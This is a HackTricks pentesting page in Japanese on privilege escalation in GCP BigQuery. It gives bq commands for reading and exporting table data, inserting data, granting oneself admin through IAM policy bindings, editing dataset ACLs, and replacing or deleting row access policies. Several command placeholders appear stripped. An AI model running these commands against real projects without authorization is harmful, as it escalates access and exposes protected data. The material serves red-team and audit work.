GCP - BigQuery Privesc

Tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

BigQuery

BigQueryに関する詳細は以下を参照してください:

GCP - Bigquery Enum

Read Table

BigQueryテーブル内に格納された情報を読み取ることで、機密情報が見つかる可能性があります。情報にアクセスするために必要な権限は bigquery.tables.getbigquery.jobs.create および bigquery.tables.getData です:

BigQuery テーブルのデータを読み取る ```bash bq head . bq query --nouse_legacy_sql 'SELECT * FROM `..` LIMIT 1000' ```

データのエクスポート

これはデータにアクセスする別の方法です。Cloud Storage バケットにエクスポートし、ファイルをダウンロードして情報を入手します。
この操作を実行するには次の権限が必要です:bigquery.tables.exportbigquery.jobs.create、および**storage.objects.create**。

BigQuery テーブルを Cloud Storage にエクスポート ```bash bq extract .
"gs:///table*.csv" ```

データの挿入

別の場所にある脆弱性を悪用するために、BigQuery テーブルに 特定の信頼されたデータを導入 できる場合があります。これは bigquery.tables.get, bigquery.tables.updateData および bigquery.jobs.create の権限があれば簡単に実行できます:

BigQuery テーブルにデータを挿入 ```bash # Via query bq query --nouse_legacy_sql 'INSERT INTO `..` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

Via insert param

bq insert dataset.table /tmp/mydata.json

</details>

### `bigquery.datasets.setIamPolicy`

攻撃者はこの権限を悪用して、BigQuery データセットに対して **自身にさらなる権限を付与する** ことができます:

<details>
<summary>BigQuery データセットの IAM ポリシーを設定</summary>
```bash
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

この権限だけで、誰がアクセスできるかを示す ACLs を変更することで、BigQuery データセットに対するあなたのアクセス権を更新できます:

BigQuery データセットの ACLs を更新 ```bash # Download current permissions, reqires bigquery.datasets.get bq show --format=prettyjson : > acl.json ## Give permissions to the desired user bq update --source acl.json : ## Read it with bq head $PROJECT_ID:.
```

bigquery.tables.setIamPolicy

攻撃者はこの権限を悪用して、BigQuery テーブルに対して自分にさらに権限を付与することができます:

BigQuery テーブルの IAM ポリシーを設定 ```bash # For this you also need bigquery.tables.setIamPolicy bq add-iam-policy-binding \ --member='user:' \ --role='roles/bigquery.admin' \ :.

use the set-iam-policy if you don’t have bigquery.tables.setIamPolicy

</details>

### `bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

ドキュメントによると、前述の権限があれば**行アクセスポリシーを更新**できます。\
しかし、**cli `bq` を使用する場合**、さらに次の権限が必要です: **`bigquery.rowAccessPolicies.create`**, **`bigquery.tables.get`**。

<details>
<summary>行アクセスポリシーの作成または置換</summary>
```bash
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used

row policies の列挙の出力から filter ID を見つけることができます。例:

row access policies を列挙する ```bash bq ls --row_access_policies :.

Id Filter Predicate Grantees Creation Time Last Modified Time

apac_filter term = “Cfba” user:asd@hacktricks.xyz 21 Jan 23:32:09 21 Jan 23:32:09

</details>

もし **`bigquery.rowAccessPolicies.delete`** を `bigquery.rowAccessPolicies.update` の代わりに持っている場合、ポリシーを削除することもできます:

<details>
<summary>行アクセス ポリシーを削除</summary>
```bash
# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

Caution

行アクセスポリシーを回避する別の方法として、制限されたデータの値を単に変更することが考えられます。もし termCfba のときしか見えないなら、テーブル内のすべてのレコードを term = "Cfba" に変更すればよい。しかしこれは bigquery によって防止されます。

Tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする